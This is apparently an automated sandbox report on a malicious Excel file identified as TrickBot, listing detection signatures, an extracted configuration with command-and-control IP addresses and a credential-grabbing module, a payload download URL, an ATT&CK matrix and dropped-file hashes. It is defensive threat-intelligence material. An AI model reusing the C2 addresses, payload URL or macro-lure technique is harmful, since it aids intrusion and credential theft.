Play interactive tourEdit tour
Analysis Report 446446.xls
Overview
General Information
Detection
Hidden Macro 4.0 TrickBot
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Code function: | 1_2_0407282D | |
Source: | Code function: | 1_2_0407282D |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Process created: | Jump to behavior |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution33 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1138157 | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
living-traditions.com | 64.207.186.30 | true | false |
| unknown |
clientconfig.passport.net | unknown | unknown | true |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385552 |
Start date: | 12.04.2021 |
Start time: | 17:11:27 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 446446.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 30 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLS@5/8@2/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:12:30 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
64.207.186.30 | Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133926 |
Entropy (8bit): | 5.3703247507002985 |
Encrypted: | false |
SSDEEP: | 1536:/cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:EVQ9DQW+zYXO8 |
MD5: | 9559FA6EB738D9BC9BC6833652EB4E4D |
SHA1: | 76522723B61DE9679B0D276B600E7A8860267B01 |
SHA-256: | 32E6DB996EAC4915BA6F963A9406C5B611BBBF295F24C516F99E6EC1FC0316D1 |
SHA-512: | 1A5ADED8BA8EE3C2783C3FEB993A3F306C5B7531F912F9A94DDBF9BF2FC7C11C670B2237694CFE0B2A1DB3F4F227FB5EFE21D00E66A7F2186F3FC51B4F43C626 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | http://living-traditions.com/blogs/click.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80472 |
Entropy (8bit): | 7.887674613462612 |
Encrypted: | false |
SSDEEP: | 1536:clJGmOQRbgrWGHKT7AeWRlMVGoIahaDHTU6hryF70KiQ:cbGmOQRbgrW2KT7g2sTU2yF70KiQ |
MD5: | 3806F1BA0C68ABABDAAD11C09F7E7C84 |
SHA1: | 2B1B86584B11EE9407A39D88B5044E403D7ACDEF |
SHA-256: | D65513C26BDE3DD4AE8DA9A7C16BE2540FD551D6D6674EEE7E0D9792881F99A1 |
SHA-512: | 88ADF638FD18E386F539610589BD0AD96F247A149B93CC589DCE8A3BB0B79D2BA2BC737EC297E1613FA95A0A902EAB55AAB3D628FFDF7E0084D4246677E7966F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2066 |
Entropy (8bit): | 4.651416909086472 |
Encrypted: | false |
SSDEEP: | 24:8/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6my/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6m:8/YmvxS8Da8HIB6p/YmvxS8Da8HIB6 |
MD5: | 5AB3706D085881A1D4836C30CB8212C4 |
SHA1: | C6B634036314EA7D9308E7B10DE84E370DA37B9E |
SHA-256: | EC254D08DEA693D4456B6DFA2E215A7C2F8798202D09A7CC81924AD883629625 |
SHA-512: | 2C7E15C1EF6CFB4D129779ED69BF95F7B3FE735BF3F734276470B2097C2AFA1FCFC6CCEE0354DCA54BB77719710599715E110BEF4BEFF2E504F6AFE514CD7338 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.643076575571524 |
Encrypted: | false |
SSDEEP: | 12:8iRcXUV3tHuElPCH2JgUxw7GhOX+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8iRbt4Uxw6uAZiDMq87aB6m |
MD5: | EF3F360D18E0AF8661AFEACCC90C95B9 |
SHA1: | C8A408AFD5B1C569A55884F34482716D9E4E5E8A |
SHA-256: | 425B362E827F53278F7D587E1EC47AFEB3B3DA2BDBDF9E440B3B696583418954 |
SHA-512: | 32EE8CA8843B2E7F5B5B79680B6856A3C417484EEC79E192BB2EA131FA0DD99A67EF24173F02040115D1D4B136D27A2CF080DE19AED4C18D7C28EF3FEC9F6333 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 83 |
Entropy (8bit): | 4.062636835813932 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMJRT3Ip273Ip2mMJRT3Ip2v:dj6J14LmJ142 |
MD5: | 546FBC897E0253FD4115B55013DB9EC5 |
SHA1: | 01C5E19E8AD4B7DB773765B0522E2524926CBE8E |
SHA-256: | 77F95B49BFF9A69DEC8FC0B77F48EBF54111EB7F4BDAD317A51C9A019FE250BF |
SHA-512: | 088C09B290FF9AA6E5D2BC373D19EFA034D2DF07B52A12F6B69B8B47FEA74ED6F4BD3EDDAF4B0E294E3556D752588AC7CC5B6F18B72FA391AB6091E07006D689 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 161733 |
Entropy (8bit): | 6.925925053233649 |
Encrypted: | false |
SSDEEP: | 3072:V78rmOAIyyzElBIL6lECbgBGzP5xLm7TK2jTUqyF70virW2akHGaakHh5o78rmOQ:p8rmOAIyyzElBIL6lECbgB+P5Nm7T5UW |
MD5: | 8F620D3AB90FC12134D008C890041FDA |
SHA1: | 07FFAE23C88B756A4FA3D0C8903B996EE05A1620 |
SHA-256: | D48665C8B028E9328061DF6988465D7F5B576EE3ED3B3214EE4138CC5E3119D9 |
SHA-512: | E3430608D5E3546AB186E9C42E48B2E49245AE79750F73A39CB81F1BC005B33F6F935A6874BA099079C02360B1494C98B1765A76875D42C5876ED6EB03A36C09 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
